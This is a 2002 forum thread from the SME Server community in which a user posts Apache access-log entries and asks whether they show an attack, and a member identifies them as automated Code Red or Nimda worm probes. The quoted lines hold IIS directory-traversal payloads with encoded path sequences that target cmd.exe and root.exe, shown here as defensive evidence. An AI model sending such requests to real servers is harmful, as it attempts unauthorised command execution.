Koozali.org: home of the SME Server

Attach maybe

Kenneth Franklin

Attach maybe
« on: October 25, 2002, 03:42:17 AM »
I have got my SME 5.5 running and now i see this in my httpd/access_log:

www.xxx.xxx 213.112.66.124 - - [25/Oct/2002:00:04:23 -0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
www.xxx.xxx 213.112.66.124 - - [25/Oct/2002:00:04:23 -0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"
www.xxx.xxx 213.112.66.124 - - [25/Oct/2002:00:04:23 -0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
www.xxx.xxx 213.112.66.124 - - [25/Oct/2002:00:04:23 -0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
www.xxx.xxx 213.112.66.124 - - [25/Oct/2002:00:04:23 -0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
www.xxx.xxx 213.112.66.124 - - [25/Oct/2002:00:04:23 -0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
www.xxx.xxx 213.112.66.124 - - [25/Oct/2002:00:04:23 -0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
www.xxx.xxx 213.112.66.124 - - [25/Oct/2002:00:04:23 -0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265 "-" "-"
www.xxx.xxx 213.112.66.124 - - [25/Oct/2002:00:04:23 -0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
www.xxx.xxx 213.112.66.124 - - [25/Oct/2002:00:04:23 -0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
www.xxx.xxx 213.112.66.124 - - [25/Oct/2002:00:04:23 -0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
www.xxx.xxx 213.112.66.124 - - [25/Oct/2002:00:04:23 -0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
www.xxx.xxx 213.112.66.124 - - [25/Oct/2002:00:04:23 -0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
www.xxx.xxx 213.112.66.124 - - [25/Oct/2002:00:04:23 -0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
www.xxx.xxx 213.112.66.124 - - [25/Oct/2002:00:04:23 -0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
www.xxx.xxx 213.112.66.124 - - [25/Oct/2002:00:04:23 -0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
www.xxx.xxx 213.112.66.124 - - [25/Oct/2002:00:20:49 -0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
www.xxx.xxx 213.112.66.124 - - [25/Oct/2002:00:20:49 -0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"
www.xxx.xxx 213.112.66.124 - - [25/Oct/2002:00:20:49 -0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
www.xxx.xxx 213.112.66.124 - - [25/Oct/2002:00:20:49 -0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
www.xxx.xxx 213.112.66.124 - - [25/Oct/2002:00:20:49 -0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
www.xxx.xxx 213.112.66.124 - - [25/Oct/2002:00:20:49 -0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
www.xxx.xxx 213.112.66.124 - - [25/Oct/2002:00:20:49 -0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
www.xxx.xxx 213.112.66.124 - - [25/Oct/2002:00:20:49 -0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265 "-" "-"
www.xxx.xxx 213.112.66.124 - - [25/Oct/2002:00:20:49 -0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
www.xxx.xxx 213.112.66.124 - - [25/Oct/2002:00:20:49 -0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
www.xxx.xxx 213.112.66.124 - - [25/Oct/2002:00:20:49 -0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
www.xxx.xxx 213.112.66.124 - - [25/Oct/2002:00:20:49 -0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
www.xxx.xxx 213.112.66.124 - - [25/Oct/2002:00:20:49 -0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
www.xxx.xxx 213.112.66.124 - - [25/Oct/2002:00:20:49 -0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
www.xxx.xxx 213.112.66.124 - - [25/Oct/2002:00:20:49 -0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
www.xxx.xxx 213.112.66.124 - - [25/Oct/2002:00:20:50 -0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
www.xxx.xxx 147.32.32.180 - - [25/Oct/2002:00:30:31 -0100] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 - "-" "-"

I have replaced my adress with x´s

This is just some of it. It happens all the time. I not so sure about reading the log so could anyone please tell me what is going on.

Thanks

Kenneth Franklin

Kenneth Franklin

Re: Attach maybe
« Reply #1 on: October 25, 2002, 03:43:42 AM »
Ups the subject should ofcourse be "Attack maybe"

Dan Brown

Re: Attach maybe
« Reply #2 on: October 25, 2002, 03:47:00 AM »
This is either Code Red or Nimda (can't remember which at the moment).  Nothing to worry about on an apache server.

Kenneth Franklin

Re: Attach maybe
« Reply #3 on: October 25, 2002, 03:51:29 AM »
Thanks for the quick reply. So if I understand right. The PC behind the ip´s i can see in the log is intected with either Code Red or Nimda and the person dosn´t know about it (hopefully)?? Or is a person trying manually to get in using the above.

Dan Brown

Re: Attach maybe
« Reply #4 on: October 25, 2002, 04:14:21 AM »
Yep, your understanding is right.  It attacks automatically, and generally the owner of the server doesn't know it's happening.